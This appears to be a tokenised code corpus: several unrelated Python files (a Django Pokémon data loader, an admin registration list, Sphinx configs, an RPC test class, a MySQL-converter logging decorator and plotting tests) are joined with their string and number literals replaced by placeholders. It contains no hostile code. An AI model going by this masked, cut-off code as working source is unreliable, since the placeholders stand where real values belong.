'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> mv = Move . objects . get ( pk = int ( row [ <NUM_LIT:2> ] ) ) <EOL> pm , created = MovePokemon . objects . get_or_create ( <EOL> pokemon = poke , <EOL> move = mv , <EOL> ) <EOL> if created : <EOL> learn = LEARN [ int ( row [ <NUM_LIT:3> ] ) ] if int ( row [ <NUM_LIT:3> ] ) <= <NUM_LIT:5> else LEARN [ <NUM_LIT:5> ] <EOL> pm . learn_type = learn <EOL> pm . level = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> pm . save ( ) <EOL> print '<STR_LIT>' + pm . __unicode__ ( ) <EOL> def build_egg_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> egg = EggGroup . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . egg_group . add ( egg ) <EOL> poke . save ( ) <EOL> def build_type_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> ty = Type . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . types . add ( ty ) <EOL> poke . save ( ) <EOL> print '<STR_LIT>' + ty . name + '<STR_LIT>' + poke . name <EOL> def build_sprites ( ) : <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT> ) : <EOL> str_num = str ( i ) <EOL> sfile = '<STR_LIT>' % str_num <EOL> p = Pokemon . objects . filter ( pkdx_id = i ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> s = Sprite ( <EOL> name = p . name + '<STR_LIT>' , <EOL> image = sfile ) <EOL> s . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> else : <EOL> print '<STR_LIT>' % i <EOL> def poke_sprite_links ( ) : <EOL> for i in Sprite . objects . all ( ) : <EOL> p = Pokemon . objects . filter ( name = i . name [ : - <NUM_LIT:5> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> p . sprites . add ( i ) <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> else : <EOL> print '<STR_LIT>' % i . name [ : - <NUM_LIT:5> ] <EOL> def build_poke_stats ( ) : <EOL> """<STR_LIT>""" <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> p = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> p . height = row [ <NUM_LIT:3> ] if row [ <NUM_LIT:3> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . weight = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . happiness = row [ <NUM_LIT:5> ] if row [ <NUM_LIT:5> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> file = open ( '<STR_LIT>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> p = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:1>' : <EOL> p . hp = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:2>' : <EOL> p . attack = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:3>' : <EOL> p . defense = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:4>' : <EOL> p . sp_atk = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:5>' : <EOL> p . sp_def = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> p . speed = row [ <NUM_LIT:2> ] <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> def build_evolutions ( ) : <EOL> """<STR_LIT>""" <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> method = [ '<STR_LIT:U+0020>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> frm = Pokemon . objects . filter ( pkdx_id = int ( row [ <NUM_LIT:1> ] ) - <NUM_LIT:1> ) <EOL> if not frm . exists ( ) : <EOL> frm = Pokemon . objects . filter ( pkdx_id = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> frm = frm [ <NUM_LIT:0> ] <EOL> to = Pokemon . objects . filter ( pkdx_id = int ( row [ <NUM_LIT:1> ] ) ) <EOL> if not to . exists ( ) : <EOL> to = Pokemon . objects . filter ( pkdx_id = <NUM_LIT:2> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> to = to [ <NUM_LIT:0> ] <EOL> if method [ int ( row [ <NUM_LIT:2> ] ) ] == '<STR_LIT>' : <EOL> e = Evolution ( <EOL> frm = frm , <EOL> to = to , <EOL> method = method [ int ( row [ <NUM_LIT:2> ] ) ] , <EOL> level = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> ) <EOL> e . save ( ) <EOL> print '<STR_LIT>' % e . __unicode__ ( ) <EOL> def build_move_descriptions ( ) : <EOL> """<STR_LIT>""" <EOL> for m in Move . objects . all ( ) : <EOL> f_moves = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> f_descrips = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> for row in csv . reader ( f_moves , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if str ( row [ <NUM_LIT:1> ] ) == m . name : <EOL> for drow in csv . reader ( f_descrips , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if str ( row [ <NUM_LIT:10> ] ) == str ( drow [ <NUM_LIT:0> ] ) : <EOL> s = str ( drow [ <NUM_LIT:3> ] ) . replace ( <EOL> '<STR_LIT>' , str ( row [ <NUM_LIT:11> ] ) ) <EOL> s = s . replace ( '<STR_LIT:[>' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:]>' , '<STR_LIT>' ) <EOL> m . description = s <EOL> m . save ( ) <EOL> print '<STR_LIT>' % m . name <EOL> def build_complex_evolutions ( ) : <EOL> """<STR_LIT>""" <EOL> fspecies = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> fevols = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> method = [ '<STR_LIT:U+0020>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> c = <NUM_LIT:0> <EOL> for row in csv . reader ( fspecies , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' and row [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> frm = Pokemon . objects . get ( pkdx_id = int ( row [ <NUM_LIT:3> ] ) ) <EOL> fevols = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> for erow in csv . reader ( fevols , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if erow [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> to = Pokemon . objects . get ( pkdx_id = int ( erow [ <NUM_LIT:1> ] ) ) <EOL> if int ( erow [ <NUM_LIT:1> ] ) == int ( row [ <NUM_LIT:0> ] ) : <EOL> mthd = method [ int ( erow [ <NUM_LIT:2> ] ) ] <EOL> lvl = erow [ <NUM_LIT:4> ] if erow [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> e = Evolution ( frm = frm , to = to , method = mthd , level = lvl ) <EOL> e . save ( ) <EOL> print '<STR_LIT>' % ( frm . name , to . name ) <EOL> c += <NUM_LIT:1> <EOL> print '<STR_LIT>' % str ( c ) <EOL> def build_pokedex_descriptions ( ) : <EOL> """<STR_LIT>""" <EOL> gens = { <NUM_LIT:1> : '<STR_LIT:1>' , <NUM_LIT:2> : '<STR_LIT:1>' , <NUM_LIT:3> : '<STR_LIT:1>' , <NUM_LIT:4> : '<STR_LIT:1>' , <NUM_LIT:5> : '<STR_LIT:1>' , <NUM_LIT:6> : '<STR_LIT:1>' , <EOL> <NUM_LIT:7> : '<STR_LIT:2>' , <NUM_LIT:8> : '<STR_LIT:2>' , <NUM_LIT:9> : '<STR_LIT:2>' , <NUM_LIT:10> : '<STR_LIT:3>' , <NUM_LIT:11> : '<STR_LIT:3>' , <NUM_LIT:12> : '<STR_LIT:3>' , <NUM_LIT> : '<STR_LIT:3>' , <EOL> <NUM_LIT> : '<STR_LIT:3>' , <NUM_LIT:15> : '<STR_LIT:4>' , <NUM_LIT:16> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT:20> : '<STR_LIT:5>' , <EOL> <NUM_LIT> : '<STR_LIT:5>' , <NUM_LIT> : '<STR_LIT:5>' , <NUM_LIT> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> descrips = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> c = <NUM_LIT:0> <EOL> for row in csv . reader ( descrips , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' and int ( row [ <NUM_LIT:2> ] ) == <NUM_LIT:9> : <EOL> p = Pokemon . objects . get ( pkdx_id = int ( row [ <NUM_LIT:0> ] ) ) <EOL> g = Game . objects . get ( pk = row [ <NUM_LIT:1> ] ) <EOL> d , _ = Description . objects . get_or_create ( <EOL> name = p . name + '<STR_LIT>' + gens [ int ( row [ <NUM_LIT:1> ] ) ] , <EOL> description = row [ <NUM_LIT:3> ] ) <EOL> d . game . add ( g ) <EOL> d . save ( ) <EOL> print '<STR_LIT>' % ( d . name , g . name ) <EOL> c += <NUM_LIT:1> <EOL> print '<STR_LIT>' % str ( c ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib import admin <EOL> from . models import * <EOL> admin . site . register ( Ability ) <EOL> admin . site . register ( AbilityName ) <EOL> admin . site . register ( AbilityEffectText ) <EOL> admin . site . register ( AbilityFlavorText ) <EOL> admin . site . register ( AbilityChange ) <EOL> admin . site . register ( AbilityChangeEffectText ) <EOL> admin . site . register ( Berry ) <EOL> admin . site . register ( BerryFirmness ) <EOL> admin . site . register ( BerryFirmnessName ) <EOL> admin . site . register ( BerryFlavor ) <EOL> admin . site . register ( Characteristic ) <EOL> admin . site . register ( CharacteristicDescription ) <EOL> admin . site . register ( ContestCombo ) <EOL> admin . site . register ( ContestEffectEffectText ) <EOL> admin . site . register ( ContestEffectFlavorText ) <EOL> admin . site . register ( ContestEffect ) <EOL> admin . site . register ( ContestType ) <EOL> admin . site . register ( ContestTypeName ) <EOL> admin . site . register ( EggGroup ) <EOL> admin . site . register ( EggGroupName ) <EOL> admin . site . register ( EncounterCondition ) <EOL> admin . site . register ( EncounterConditionValue ) <EOL> admin . site . register ( EncounterConditionName ) <EOL> admin . site . register ( EncounterConditionValueName ) <EOL> admin . site . register ( EncounterConditionValueMap ) <EOL> admin . site . register ( EncounterMethod ) <EOL> admin . site . register ( EncounterMethodName ) <EOL> admin . site . register ( EncounterSlot ) <EOL> admin . site . register ( Encounter ) <EOL> admin . site . register ( EvolutionChain ) <EOL> admin . site . register ( EvolutionTrigger ) <EOL> admin . site . register ( EvolutionTriggerName ) <EOL> admin . site . register ( Experience ) <EOL> admin . site . register ( Gender ) <EOL> admin . site . register ( Generation ) <EOL> admin . site . register ( GenerationName ) <EOL> admin . site . register ( GrowthRate ) <EOL> admin . site . register ( GrowthRateDescription ) <EOL> admin . site . register ( ItemCategory ) <EOL> admin . site . register ( ItemCategoryName ) <EOL> admin . site . register ( ItemAttribute ) <EOL> admin . site . register ( ItemAttributeMap ) <EOL> admin . site . register ( ItemAttributeDescription ) <EOL> admin . site . register ( ItemFlavorText ) <EOL> admin . site . register ( ItemFlingEffect ) <EOL> admin . site . register ( ItemFlingEffectEffectText ) <EOL> admin . site . register ( ItemGameIndex ) <EOL> admin . site . register ( ItemName ) <EOL> admin . site . register ( ItemPocketName ) <EOL> admin . site . register ( ItemPocket ) <EOL> admin . site . register ( ItemEffectText ) <EOL> admin . site . register ( Item ) <EOL> admin . site . register ( Language ) <EOL> admin . site . register ( LanguageName ) <EOL> admin . site . register ( LocationAreaEncounterRate ) <EOL> admin . site . register ( LocationAreaName ) <EOL> admin . site . register ( LocationArea ) <EOL> admin . site . register ( LocationGameIndex ) <EOL> admin . site . register ( LocationName ) <EOL> admin . site . register ( Location ) <EOL> admin . site . register ( Machine ) <EOL> admin . site . register ( MoveBattleStyle ) <EOL> admin . site . register ( MoveBattleStyleName ) <EOL> admin . site . register ( MoveChange ) <EOL> admin . site . register ( MoveDamageClass ) <EOL> admin . site . register ( MoveDamageClassDescription ) <EOL> admin . site . register ( MoveEffectChange ) <EOL> admin . site . register ( MoveEffectChangeEffectText ) <EOL> admin . site . register ( MoveEffectEffectText ) <EOL> admin . site . register ( MoveEffect ) <EOL> admin . site . register ( MoveAttributeDescription ) <EOL> admin . site . register ( MoveAttributeMap ) <EOL> admin . site . register ( MoveAttributeName ) <EOL> admin . site . register ( MoveAttribute ) <EOL> admin . site . register ( MoveFlavorText ) <EOL> admin . site . register ( MoveLearnMethod ) <EOL> admin . site . register ( MoveLearnMethodName ) <EOL> admin . site . register ( MoveMeta ) <EOL> admin . site . register ( MoveMetaAilment ) <EOL> admin . site . register ( MoveMetaAilmentName ) <EOL> admin . site . register ( MoveMetaCategoryDescription ) <EOL> admin . site . register ( MoveMetaCategory ) <EOL> admin . site . register ( MoveMetaStatChange ) <EOL> admin . site . register ( MoveName ) <EOL> admin . site . register ( MoveTargetDescription ) <EOL> admin . site . register ( MoveTarget ) <EOL> admin . site . register ( Move ) <EOL> admin . site . register ( NatureBattleStylePreference ) <EOL> admin . site . register ( NatureName ) <EOL> admin . site . register ( NaturePokeathlonStat ) <EOL> admin . site . register ( Nature ) <EOL> admin . site . register ( PalParkArea ) <EOL> admin . site . register ( PalParkAreaName ) <EOL> admin . site . register ( PalPark ) <EOL> admin . site . register ( PokeathlonStatName ) <EOL> admin . site . register ( PokeathlonStat ) <EOL> admin . site . register ( Pokedex ) <EOL> admin . site . register ( PokedexVersionGroup ) <EOL> admin . site . register ( PokedexDescription ) <EOL> admin . site . register ( Pokemon ) <EOL> admin . site . register ( PokemonAbility ) <EOL> admin . site . register ( PokemonColor ) <EOL> admin . site . register ( PokemonColorName ) <EOL> admin . site . register ( PokemonDexNumber ) <EOL> admin . site . register ( PokemonEggGroup ) <EOL> admin . site . register ( PokemonEvolution ) <EOL> admin . site . register ( PokemonForm ) <EOL> admin . site . register ( PokemonFormName ) <EOL> admin . site . register ( PokemonFormGeneration ) <EOL> admin . site . register ( PokemonGameIndex ) <EOL> admin . site . register ( PokemonHabitat ) <EOL> admin . site . register ( PokemonHabitatName ) <EOL> admin . site . register ( PokemonItem ) <EOL> admin . site . register ( PokemonMove ) <EOL> admin . site . register ( PokemonShape ) <EOL> admin . site . register ( PokemonShapeName ) <EOL> admin . site . register ( PokemonSpecies ) <EOL> admin . site . register ( PokemonSpeciesName ) <EOL> admin . site . register ( PokemonSpeciesDescription ) <EOL> admin . site . register ( PokemonSpeciesFlavorText ) <EOL> admin . site . register ( PokemonStat ) <EOL> admin . site . register ( PokemonType ) <EOL> admin . site . register ( Region ) <EOL> admin . site . register ( RegionName ) <EOL> admin . site . register ( StatName ) <EOL> admin . site . register ( Stat ) <EOL> admin . site . register ( SuperContestEffect ) <EOL> admin . site . register ( SuperContestCombo ) <EOL> admin . site . register ( SuperContestEffectFlavorText ) <EOL> admin . site . register ( Type ) <EOL> admin . site . register ( TypeName ) <EOL> admin . site . register ( TypeGameIndex ) <EOL> admin . site . register ( TypeEfficacy ) <EOL> admin . site . register ( Version ) <EOL> admin . site . register ( VersionName ) <EOL> admin . site . register ( VersionGroup ) <EOL> admin . site . register ( VersionGroupMoveLearnMethod ) <EOL> admin . site . register ( VersionGroupRegion ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from updater4pyi import upd_version <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = upd_version . version_str <EOL> release = version <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> from zero . rpc import ConfiguredRPC <EOL> def _get_test_config ( ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> } <EOL> class CommonRPC ( ConfiguredRPC ) : <EOL> '<STR_LIT>' <EOL> def ping ( self ) : <EOL> return '<STR_LIT>' <EOL> def echo ( self , msg ) : <EOL> return msg <EOL> def hostname ( self ) : <EOL> from socket import gethostname <EOL> return gethostname ( ) <EOL> def time ( self ) : <EOL> import time <EOL> return time . time ( ) </s>
<s> import sys , os <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> epub_title = u'<STR_LIT>' <EOL> epub_author = u'<STR_LIT>' <EOL> epub_publisher = u'<STR_LIT>' <EOL> epub_copyright = u'<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> import sys <EOL> from functools import wraps <EOL> from . mysql_reader import MysqlReader <EOL> try : <EOL> from termcolor import cprint <EOL> except ImportError : <EOL> pass <EOL> def print_row_progress ( val ) : <EOL> try : <EOL> cprint ( '<STR_LIT>' % val , '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> except NameError : <EOL> print ( '<STR_LIT>' % val ) , <EOL> sys . stdout . flush ( ) <EOL> def print_start_table ( val ) : <EOL> try : <EOL> cprint ( val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( val ) <EOL> def print_table_actions ( val ) : <EOL> try : <EOL> cprint ( '<STR_LIT>' % val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( '<STR_LIT>' % val ) <EOL> def find_first ( items , func ) : <EOL> return next ( ( item for item in items if func ( item ) ) , None ) <EOL> def print_red ( val ) : <EOL> try : <EOL> cprint ( val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( val ) <EOL> def status_logger ( f ) : <EOL> start_template = '<STR_LIT>' <EOL> finish_template = '<STR_LIT>' <EOL> truncate_template = '<STR_LIT>' <EOL> create_template = '<STR_LIT>' <EOL> constraints_template = '<STR_LIT>' <EOL> write_contents_template = '<STR_LIT>' <EOL> index_template = '<STR_LIT>' <EOL> trigger_template = '<STR_LIT>' <EOL> statuses = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % truncate_template , <EOL> '<STR_LIT>' : finish_template % truncate_template <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % create_template , <EOL> '<STR_LIT>' : finish_template % create_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % constraints_template , <EOL> '<STR_LIT>' : finish_template % constraints_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % write_contents_template , <EOL> '<STR_LIT>' : finish_template % write_contents_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % index_template , <EOL> '<STR_LIT>' : finish_template % index_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % trigger_template , <EOL> '<STR_LIT>' : finish_template % trigger_template , <EOL> } , <EOL> } <EOL> @ wraps ( f ) <EOL> def decorated_function ( * args , ** kwargs ) : <EOL> if getattr ( args [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> table = kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> table = find_first ( list ( args ) + kwargs . values ( ) , lambda c : c . __class__ is MysqlReader . Table ) <EOL> assert table <EOL> print_table_actions ( statuses [ f . func_name ] [ '<STR_LIT:start>' ] % table . name ) <EOL> ret = f ( * args , ** kwargs ) <EOL> print_table_actions ( statuses [ f . func_name ] [ '<STR_LIT>' ] % table . name ) <EOL> return ret <EOL> else : <EOL> return f ( * args , ** kwargs ) <EOL> return decorated_function </s>
<s> import numpy as np <EOL> import matplotlib as mpl <EOL> from matplotlib import pyplot as plt <EOL> import lineid_plot <EOL> def test_unique_labels ( ) : <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> x = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert lineid_plot . unique_labels ( line_label1 ) == x <EOL> def test_minimal_plot ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 ) <EOL> def test_no_line_from_annotation_to_flux ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , extend = False ) <EOL> def test_multi_plot_user_axes ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_axes ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax . plot ( wave , flux ) <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , ax = ax ) <EOL> ax1 = fig . add_axes ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax1 . plot ( wave , flux ) <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , ax = ax1 ) <EOL> def test_annotate_kwargs_and_plot_kwargs ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ak = lineid_plot . initial_annotate_kwargs ( ) <EOL> ak [ '<STR_LIT>' ] [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> pk = lineid_plot . initial_plot_kwargs ( ) <EOL> pk [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , annotate_kwargs = ak , plot_kwargs = pk ) <EOL> def test_customize_box_and_line ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig , ax = lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 ) <EOL> b = ax . findobj ( match = lambda x : x . get_label ( ) == '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> b . set_rotation ( <NUM_LIT:0> ) <EOL> b . set_text ( "<STR_LIT>" ) <EOL> line = ax . findobj ( match = lambda x : x . get_label ( ) == '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> line . set_color ( "<STR_LIT>" ) <EOL> line . set_linestyle ( "<STR_LIT:->" ) <EOL> def test_small_change_to_y_loc_of_label ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> box_axes_space = <NUM_LIT> ) <EOL> def 